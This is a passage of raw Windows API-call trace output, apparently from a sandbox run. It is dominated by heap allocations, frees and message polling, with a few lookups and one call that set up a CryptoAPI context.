lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0184.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0184.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0184.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0184.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0184.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0184.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0184.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0184.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0184.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0184.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0184.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0184.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0184.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0184.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0184.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0184.230] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0184.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0184.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0184.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0184.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0184.230] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0184.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0184.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0184.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0184.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0184.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0184.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0184.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0184.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0184.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0184.230] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0184.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0184.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0184.231] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0184.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0184.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0184.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0184.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0184.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0184.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0184.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0184.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0184.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0184.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0184.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0184.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.232] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0184.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0184.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0184.233] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.233] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0184.233] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0184.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.234] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0184.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0184.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0184.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e699a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0184.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0184.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0184.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0184.236] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0184.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0184.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0184.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0184.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0184.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0184.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0184.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0184.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a68 [0184.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0184.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0184.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0184.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0184.237] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0184.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0184.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0184.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0184.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0184.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0184.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0184.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0184.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0184.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0184.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0184.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0184.238] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0184.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0184.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0184.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0184.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0184.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0184.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0184.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0184.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0184.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0184.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0184.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0184.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0184.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0184.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0184.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0184.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0184.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0184.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0184.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0184.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0184.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0184.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0184.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0184.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0184.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0184.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0184.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0184.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0184.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0184.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0184.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0184.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0184.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0184.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0184.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0184.241] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0184.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0184.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0184.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0184.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0184.242] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0184.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0184.242] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0184.242] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0184.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0184.242] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0184.242] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.242] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.242] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0184.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0184.242] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.242] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0184.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0184.242] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0184.243] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0184.243] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 